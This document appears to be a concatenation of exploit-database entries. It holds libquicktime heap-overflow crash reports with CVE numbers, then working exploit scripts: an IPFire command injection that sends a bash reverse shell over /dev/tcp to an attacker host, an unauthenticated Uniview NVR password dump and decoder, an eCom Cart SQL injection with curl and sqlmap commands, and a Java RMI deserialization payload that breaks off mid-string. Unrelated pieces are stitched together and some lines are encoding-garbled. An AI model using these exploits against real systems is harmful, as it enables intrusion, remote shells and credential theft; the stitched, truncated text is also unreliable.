###################################
4.
the lqt_frame_duration function in lqt_quicktime.c in libquicktime 1.2.4 can cause a denial of service(heap-buffer-overflow) via a crafted mp4 file.
./lqtplay libquicktime_1.2.4_lqt_frame_duration_heap-buffer-overflow.mp4
=================================================================
==40038==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009cd4 at pc 0x7f28959fc45f bp 0x7ffefd561530 sp 0x7ffefd561528
READ of size 4 at 0x602000009cd4 thread T0
#0 0x7f28959fc45e in lqt_frame_duration /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1242
#1 0x49b1c6 in quicktime_print_info /home/a/Downloads/libquicktime-1.2.4/utils/common.c:138
#2 0x47fbaa in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:996
#3 0x47fbaa in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852
#4 0x7f28932c7ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
#5 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)
0x602000009cd4 is located 3 bytes to the right of 1-byte region [0x602000009cd0,0x602000009cd1)
allocated by thread T0 here:
#0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)
#1 0x7f2895cad7d0 in quicktime_read_stts /home/a/Downloads/libquicktime-1.2.4/src/stts.c:115
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1242 lqt_frame_duration
Shadow bytes around the buggy address:
0x0c047fff9340: fa fa 05 fa fa fa 05 fa fa fa 04 fa fa fa 05 fa
0x0c047fff9350: fa fa 00 fa fa fa 05 fa fa fa 05 fa fa fa 05 fa
0x0c047fff9360: fa fa 05 fa fa fa 00 fa fa fa 05 fa fa fa 05 fa
0x0c047fff9370: fa fa 05 fa fa fa 00 fa fa fa 00 00 fa fa 00 01
0x0c047fff9380: fa fa 04 fa fa fa 05 fa fa fa 00 fa fa fa 05 fa
=>0x0c047fff9390: fa fa 05 fa fa fa 00 fa fa fa[01]fa fa fa 00 04
0x0c047fff93a0: fa fa 00 00 fa fa 00 fa fa fa 00 fa fa fa 00 00
0x0c047fff93b0: fa fa 00 00 fa fa 00 00 fa fa 00 fa fa fa 00 00
0x0c047fff93c0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 fa
0x0c047fff93d0: fa fa 00 00 fa fa 00 fa fa fa fd fd fa fa fd fd
0x0c047fff93e0: fa fa fd fd fa fa 00 04 fa fa 00 00 fa fa fd fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
ASan internal: fe
==40038==ABORTING
POC:
libquicktime_1.2.4_lqt_frame_duration_heap-buffer-overflow.mp4
CVE:
CVE-2017-9125
###################################
5.
the quicktime_read_dref_table function in dref.c in libquicktime 1.2.4 can cause a denial of service(heap-buffer-overflow and application crash) via a crafted mp4 file.
./lqtplay libquicktime_1.2.4_quicktime_read_dref_table_heap-buffer-overflow.mp4
=================================================================
==41637==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009ce4 at pc 0x7f9cb9ad16e7 bp 0x7ffcf9a1e720 sp 0x7ffcf9a1e718
WRITE of size 1 at 0x602000009ce4 thread T0
#0 0x7f9cb9ad16e6 in quicktime_read_dref_table /home/a/Downloads/libquicktime-1.2.4/src/dref.c:69
#1 0x7f9cb9ad3bdd in quicktime_read_dref /home/a/Downloads/libquicktime-1.2.4/src/dref.c:147
#2 0x7f9cb9ad0388 in quicktime_read_dinf /home/a/Downloads/libquicktime-1.2.4/src/dinf.c:56
#3 0x7f9cb9afdf09 in quicktime_read_minf /home/a/Downloads/libquicktime-1.2.4/src/minf.c:220
#4 0x7f9cb9afaa9e in quicktime_read_mdia /home/a/Downloads/libquicktime-1.2.4/src/mdia.c:155
#5 0x7f9cb9b4ff1e in quicktime_read_trak /home/a/Downloads/libquicktime-1.2.4/src/trak.c:247
#6 0x7f9cb9b0172a in quicktime_read_moov /home/a/Downloads/libquicktime-1.2.4/src/moov.c:221
#7 0x7f9cb9896658 in quicktime_read_info /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1791
#8 0x7f9cb989d4a8 in do_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2026
#9 0x7f9cb986e5da in quicktime_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2075
#10 0x47fad2 in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:987
#11 0x47fad2 in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852
#12 0x7f9cb7154ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
#13 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)
0x602000009ce4 is located 12 bytes to the left of 1-byte region [0x602000009cf0,0x602000009cf1)
allocated by thread T0 here:
#0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)
#1 0x7f9cb9ad13ba in quicktime_read_dref_table /home/a/Downloads/libquicktime-1.2.4/src/dref.c:66
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/dref.c:69 quicktime_read_dref_table
Shadow bytes around the buggy address:
0x0c047fff9340: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9350: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9360: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9370: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9380: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c047fff9390: fa fa fa fa fa fa fa fa fa fa fa fa[fa]fa 01 fa
0x0c047fff93a0: fa fa 00 00 fa fa 00 fa fa fa 00 fa fa fa 00 00
0x0c047fff93b0: fa fa 00 00 fa fa 00 00 fa fa 00 fa fa fa 00 00
0x0c047fff93c0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 fa
0x0c047fff93d0: fa fa 00 00 fa fa 00 fa fa fa fd fd fa fa fd fd
0x0c047fff93e0: fa fa fd fd fa fa 00 04 fa fa 00 00 fa fa fd fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
ASan internal: fe
==41637==ABORTING
POC:
libquicktime_1.2.4_quicktime_read_dref_table_heap-buffer-overflow.mp4
CVE:
CVE-2017-9126
###################################
6.
the quicktime_user_atoms_read_atom function in useratoms.c in libquicktime 1.2.4 can cause a denial of service(heap-buffer-overflow and application crash) via a crafted mp4 file.
./lqtplay libquicktime_1.2.4_quicktime_user_atoms_read_atom_heap-buffer-overflow.mp4
=================================================================
==41642==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009cb1 at pc 0x7f3aa15d47f3 bp 0x7ffc98430d00 sp 0x7ffc98430cf8
WRITE of size 1 at 0x602000009cb1 thread T0
#0 0x7f3aa15d47f2 in quicktime_user_atoms_read_atom /home/a/Downloads/libquicktime-1.2.4/src/useratoms.c:84
#1 0x7f3aa1590bd8 in quicktime_read_stsd_video /home/a/Downloads/libquicktime-1.2.4/src/stsdtable.c:557
#2 0x7f3aa1594eb8 in quicktime_read_stsd_table /home/a/Downloads/libquicktime-1.2.4/src/stsdtable.c:694
#3 0x7f3aa158bd4d in quicktime_finalize_stsd /home/a/Downloads/libquicktime-1.2.4/src/stsd.c:336
#4 0x7f3aa1566147 in quicktime_read_minf /home/a/Downloads/libquicktime-1.2.4/src/minf.c:231
#5 0x7f3aa1562a9e in quicktime_read_mdia /home/a/Downloads/libquicktime-1.2.4/src/mdia.c:155
#6 0x7f3aa15b7f1e in quicktime_read_trak /home/a/Downloads/libquicktime-1.2.4/src/trak.c:247
#7 0x7f3aa156972a in quicktime_read_moov /home/a/Downloads/libquicktime-1.2.4/src/moov.c:221
#8 0x7f3aa12fe658 in quicktime_read_info /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1791
#9 0x7f3aa13054a8 in do_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2026
#10 0x7f3aa12d65da in quicktime_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2075
#11 0x47fad2 in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:987
#12 0x47fad2 in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852
#13 0x7f3a9ebbcec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
#14 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)
0x602000009cb1 is located 0 bytes to the right of 1-byte region [0x602000009cb0,0x602000009cb1)
allocated by thread T0 here:
#0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)
#1 0x7f3aa15d451a in quicktime_user_atoms_read_atom /home/a/Downloads/libquicktime-1.2.4/src/useratoms.c:81
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/useratoms.c:84 quicktime_user_atoms_read_atom
Shadow bytes around the buggy address:
0x0c047fff9340: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9350: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9360: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9370: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9380: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c047fff9390: fa fa fa fa fa fa[01]fa fa fa 00 fa fa fa 00 04
0x0c047fff93a0: fa fa 00 00 fa fa 00 fa fa fa 00 fa fa fa 00 00
0x0c047fff93b0: fa fa 00 00 fa fa 00 00 fa fa 00 fa fa fa 00 00
0x0c047fff93c0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 fa
0x0c047fff93d0: fa fa 00 00 fa fa 00 fa fa fa fd fd fa fa fd fd
0x0c047fff93e0: fa fa fd fd fa fa 00 04 fa fa 00 00 fa fa fd fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
ASan internal: fe
==41642==ABORTING
POC:
libquicktime_1.2.4_quicktime_user_atoms_read_atom_heap-buffer-overflow.mp4
CVE:
CVE-2017-9127
###################################
7.
the quicktime_video_width function in lqt_quicktime.c in libquicktime 1.2.4 can cause a denial of service(heap-buffer-overflow and application crash) via a crafted mp4 file.
./lqtplay libquicktime_1.2.4_quicktime_video_width_heap-buffer-overflow.mp4
=================================================================
==10979==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009d00 at pc 0x7f36a1017a37 bp 0x7ffe65a90010 sp 0x7ffe65a90008
READ of size 4 at 0x602000009d00 thread T0
#0 0x7f36a1017a36 in quicktime_video_width /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:998
#1 0x7f36a1017a36 in quicktime_init_maps /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1633
#2 0x7f36a101af13 in quicktime_read_info /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1891
#3 0x7f36a10204a8 in do_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2026
#4 0x7f36a0ff15da in quicktime_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2075
#5 0x47fad2 in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:987
#6 0x47fad2 in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852
#7 0x7f369e8d7ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
#8 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)
0x602000009d00 is located 4 bytes to the right of 12-byte region [0x602000009cf0,0x602000009cfc)
allocated by thread T0 here:
#0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)
#1 0x7f36a12543ba in quicktime_read_dref_table /home/a/Downloads/libquicktime-1.2.4/src/dref.c:66
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:998 quicktime_video_width
Shadow bytes around the buggy address:
0x0c047fff9350: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff9360: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff9370: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fd
0x0c047fff9380: fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff9390: fa fa fd fa fa fa fd fa fa fa 01 fa fa fa 00 04
=>0x0c047fff93a0:[fa]fa 00 04 fa fa 00 fa fa fa 00 fa fa fa 00 00
0x0c047fff93b0: fa fa 00 00 fa fa 00 00 fa fa 00 fa fa fa 00 00
0x0c047fff93c0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 fa
0x0c047fff93d0: fa fa 00 00 fa fa 00 fa fa fa fd fd fa fa fd fd
0x0c047fff93e0: fa fa fd fd fa fa 00 04 fa fa 00 00 fa fa fd fa
0x0c047fff93f0: fa fa 00 fa fa fa 00 00 fa fa 00 00 fa fa 00 fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
ASan internal: fe
==10979==ABORTING
POC:
libquicktime_1.2.4_quicktime_video_width_heap-buffer-overflow.mp4
CVE:
CVE-2017-9128
=================================
qflb.wu () dbappsecurity com cn
Proofs of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42148.zip
#
# Title : IPFire 2.19 Firewall Post-Auth RCE
# Date : 09/06/2017
# Author : 0x09AL (https://twitter.com/0x09AL)
# Tested on: IPFire 2.19 (x86_64) - Core Update 110
# Vendor : http://www.ipfire.org/
# Software : http://downloads.ipfire.org/releases/ipfire-2.x/2.19-core110/ipfire-2.19.x86_64-full-core110.iso
# Vulnerability Description:
# The file ids.cgi doesn't sanitize the OINKCODE parameter and gets passed to a system call which call wget.
# You need valid credentials to exploit this vulnerability or you can exploit it through CSRF.
#
#
import requests
# Adjust the ip and ports.
revhost = '192.168.56.1'
revport = 1337
url = 'https://192.168.56.102:444/cgi-bin/ids.cgi'
username = 'admin'
password = 'admin'
payload = 'bash -i >& /dev/tcp/' + revhost + '/' + str(revport) + ' 0>&1'
evildata = {'ENABLE_SNORT_GREEN':'on','ENABLE_SNORT':'on','RULES':'registered','OINKCODE': '`id`','ACTION': 'Download new ruleset','ACTION2':'snort'}
headers = {'Accept-Encoding' : 'gzip, deflate, br','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','User-Agent':'IPFIRE Exploit','Referer': url,'Upgrade-Insecure-Requests':'1'}
def verifyVuln():
req = requests.post(url,data=evildata,headers=headers,auth=(username,password),verify=False) # Verify false is added because most of the time the certificate is self signed.
if(req.status_code == 200 and "uid=99(nobody)" in req.text):
print "[+] IPFire Installation is Vulnerable [+]"
revShell()
else:
print "[+] Not Vulnerable [+]"
def revShell():
evildata["OINKCODE"] = '`' + payload + '`'
print "[+] Sending Malicious Payload [+]"
req = requests.post(url,data=evildata,headers=headers,auth=(username,password),verify=False)
verifyVuln()
#Uniview NVR remote passwords disclosure
#Author: B1t
# The Uniview NVR web application does not enforce authorizations on the main.cgi file when requesting json data.
# It says that you can do anything without authentication, however you must know the request structure.
# In addition, the users' passwords are both hashed and also stored in a reversible way
# The POC below remotely downloads the device's configuration file, extracts the credentials
# and decodes the reversible password strings using my crafted map
# It is worth mention that when you login, the javascript hashes the password with MD5 and pass the request.
# If the script does retrieve the hash and not the password, you can intercept the request and replace the generated
# MD5 with the one disclosed using this script
# Tested on the following models:
# NVR304-16E - Software Version B3118P26C00510
# NVR301-08-P8 - Software Version B3218P26C00512
#=09=09=09=09=09=09and version B3220P11
#
# Other versions may also be affected
#Usage: python nvr-pwd-disc.py http://Host_or_IP:PORT
# Run example:
# root@k4li:~# python nvr-pwd-disc.py http://192.168.1.5
#
# Uniview NVR remote passwords disclosure!
# Author: B1t
#
# [+] Getting model name and software version...
# Model: NVR301-08-P8
# Software Version: B3218P26C00512
#
# [+] Getting configuration file...
# [+] Number of users found: 4
#
# [+] Extracting users' hashes and decoding reversible strings:
#
# User =09|=09 Hash =09|=09 Password
# _________________________________________________
# admin =09|=093b9c687b1f4b9d87ed0fdd6abbf7e33d =09|=09<TRIMMED>
# default =09|=09 =09|=09||||||||||||||||||||
# HAUser =09|=09288b836a37578141fea6527b5e190120 =09|=09123HAUser123[err
# test =09|=0951b2454c681f3205f63b8372096d990b =09|=09AA123pqrstuvwxyz
#
# *Note that the users 'default' and 'HAUser' are default and sometimes in=
accessible remotely
import requests
import xml.etree.ElementTree
import sys
print "\r\nUniview NVR remote passwords disclosure!"
print "Author: B1t\r\n"
def decode_pass(rev_pass):
pass_dict =3D {'77': '1', '78': '2', '79': '3', '72': '4', '73': '5', '=
74': '6', '75': '7', '68': '8', '69': '9',
'76': '0', '93': '!', '60': '@', '95': '#', '88': '$', '89=
': '%', '34': '^', '90': '&', '86': '*',
'84': '(', '85': ')', '81': '-', '35': '_', '65': '=3D', '=
87': '+', '83': '/', '32': '\\', '0': '|',
'80': ',', '70': ':', '71': ';', '7': '{', '1': '}', '82':=
'.', '67': '?', '64': '<', '66': '>',
'2': '~', '39': '[', '33': ']', '94': '"', '91': "'", '28'=
: '`', '61': 'A', '62': 'B', '63': 'C',
'56': 'D', '57': 'E', '58': 'F', '59': 'G', '52': 'H', '53=
': 'I', '54': 'J', '55': 'K', '48': 'L',
'49': 'M', '50': 'N', '51': 'O', '44': 'P', '45': 'Q', '46=
': 'R', '47': 'S', '40': 'T', '41': 'U',
'42': 'V', '43': 'W', '36': 'X', '37': 'Y', '38': 'Z', '29=
': 'a', '30': 'b', '31': 'c', '24': 'd',
'25': 'e', '26': 'f', '27': 'g', '20': 'h', '21': 'i', '22=
': 'j', '23': 'k', '16': 'l', '17': 'm',
'18': 'n', '19': 'o', '12': 'p', '13': 'q', '14': 'r', '15=
': 's', '8': 't', '9': 'u', '10': 'v',
'11': 'w', '4': 'x', '5': 'y', '6': 'z'}
rev_pass =3D rev_pass.split(";")
pass_len =3D len(rev_pass) - rev_pass.count("124")
password =3D ""
for char in rev_pass:
if char !=3D "124": password =3D password + pass_dict[char]
return pass_len, password
if len(sys.argv) < 2:
print "Usage: " + sys.argv[0] + " http://HOST_or_IP:PORT\r\n PORT: The =
web interface's port"
print "\r\nExample: " + sys.argv[0] + " http://192.168.1.1:8850"
sys.exit()
elif "http://" not in sys.argv[1] and "https://" not in sys.argv[1]:
=09print "Usage: " + sys.argv[0] + " http://HOST_or_IP:PORT\r\n PORT: The w=
eb interface's port"
=09sys.exit()
=09
host =3D sys.argv[1]
print "[+] Getting model name and software version..."
r =3D requests.get(host + '/cgi-bin/main-cgi?json=3D{"cmd":%20116}')
if r.status_code !=3D 200:
print "Failed fetching version, got status code: " + r.status_code
print "Model: " + r.text.split('szDevName":=09"')[1].split('",')[0]
print "Software Version: " + r.text.split('szSoftwareVersion":=09"')[1].spl=
it('",')[0]
print "\r\n[+] Getting configuration file..."
r =3D requests.get(host + "/cgi-bin/main-cgi?json=3D{%22cmd%22:255,%22szUse=
rName%22:%22%22,%22u32UserLoginHandle%22:8888888888}")
if r.status_code !=3D 200:
print "Failed fetching configuration file, response code: " + r.status_=
code
sys.exit()
root =3D xml.etree.ElementTree.fromstring(r.text)
print "[+] Number of users found: " + root.find("UserCfg").get("Num")
print "\r\n[+] Extracting users' hashes and decoding reversible strings:"
users =3D root.find("UserCfg").getchildren()
print "\r\nUser \t|\t Hash \t|\t Password"
print "_________________________________________________"
for user in users:
l, p =3D decode_pass(user.get("RvsblePass"))
print user.get("UserName"), "\t|\t", user.get("UserPass"), "\t|\t", p
print "\r\n *Note that the users 'default' and 'HAUser' are default and som=
etimes inaccessible remotely"
# Exploit Title: eCom Cart 1.3 Exploit
# Google Dork: inurl:"/pdetails/11" ([11] is variable)
# Date: 10.06.2017
# Exploit Author: Alperen Eymen Ozcan & Batuhan Camci
# Vendor Homepage: https://codecanyon.net/item/ecom-cart-a-php-shopping-cart-with-blog/13731007
# Software Link: https://codecanyon.net/item/ecom-cart-a-php-shopping-cart-with-blog/13731007
# Version: 1.3
# Tested on: Linux
$ curl http://localhost/ecom-cart/charge.php -d order_id=%271
Fatal error: Uncaught PDOException: SQLSTATE[42000]: Syntax error or access
violation: 1064 You have an error in your SQL syntax; check the manual
that corresponds to your MariaDB server version for the right syntax
to use near '1'' at line 1 in
/customers/4/4/9/lobisdev.one/httpd.www/ecom-cart/charge.php:16
Stack trace:
#0 /customers/4/4/9/lobisdev.one/httpd.www/ecom-cart/charge.php(16):
PDO->query('SELECT * FROM 3...')
#1 {main}
thrown in /customers/4/4/9/lobisdev.one/httpd.www/ecom-cart/charge.php
on line 16
$ sqlmap -u "http://www.lobisdev.one/ecom-cart/charge.php' --data=order_id=1 --dbs
#!/usr/bin/env python
import socket
import sys
import ssl
def getHeader():
return '\x4a\x52\x4d\x49\x00\x02\x4b'
def payload():
cmd = sys.argv[4]
cmdlen = len(cmd)
data2 = '\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x00\x00\x00\x50\xac\xed\x00\x05\x77\x22\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x44\x15\x4d\xc9\xd4\xe6\x3b\xdf\x74\x00\x05\x70\x77\x6e\x65\x64\x73\x7d\x00\x00\x00\x01\x00\x0f\x6a\x61\x76\x61\x2e\x72\x6d\x69\x2e\x52\x65\x6d\x6f\x74\x65\x70\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x70\x78\x70\x73\x72\x00\x32\x73\x75\x6e\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x61\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x2e\x41\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x55\xca\xf5\x0f\x15\xcb\x7e\xa5\x02\x00\x02\x4c\x00\x0c\x6d\x65\x6d\x62\x65\x72\x56\x61\x6c\x75\x65\x73\x74\x00\x0f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61\x70\x3b\x4c\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x70\x78\x70\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x70\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x0c\x77\x08\x00\x00\x00\x10\x00\x00\x00\x01\x71\x00\x7e\x00\x00\x73\x71\x00\x7e\x00\x05\x73\x7d\x00\x00\x00\x01\x00\x0d\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x4d\x61\x70\x70\x78\x71\x00\x7e\x00\x02\x73\x71\x00\x7e\x00\x05\x73\x72\x00\x2a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x6d\x61\x70\x2e\x4c\x61\x7a\x79\x4d\x61\x70\x6e\xe5\x94\x82\x9e\x79\x10\x94\x03\x00\x01\x4c\x00\x07\x66\x61\x63\x74\x6f\x72\x79\x74\x00\x2c\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x70\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x68\x61\x69\x6e\x65\x64\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x30\xc7\x97\xec\x28\x7a\x97\x04\x02\x00\x01\x5b\x00\x0d\x69\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x73\x74\x00\x2d\x5b\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x70\x78\x70\x75\x72\x00\x2d\x5b\x4c\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\xbd\x56\x2a\xf1\xd8\x34\x18\x99\x02\x00\x00\x70\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3b\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x6f\x6e\x73\x74\x61\x6e\x74\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x58\x76\x90\x11\x41\x02\xb1\x94\x02\x00\x01\x4c\x00\x09\x69\x43\x6f\x6e\x73\x74\x61\x6e\x74\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x70\x78\x70\x76\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x52\x75\x6e\x74\x69\x6d\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x49\x6e\x76\x6f\x6b\x65\x72\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x87\xe8\xff\x6b\x7b\x7c\xce\x38\x02\x00\x03\x5b\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0b\x69\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x0b\x69\x50\x61\x72\x61\x6d\x54\x79\x70\x65\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x70\x78\x70\x75\x72\x00\x13\x5b\x4c\x6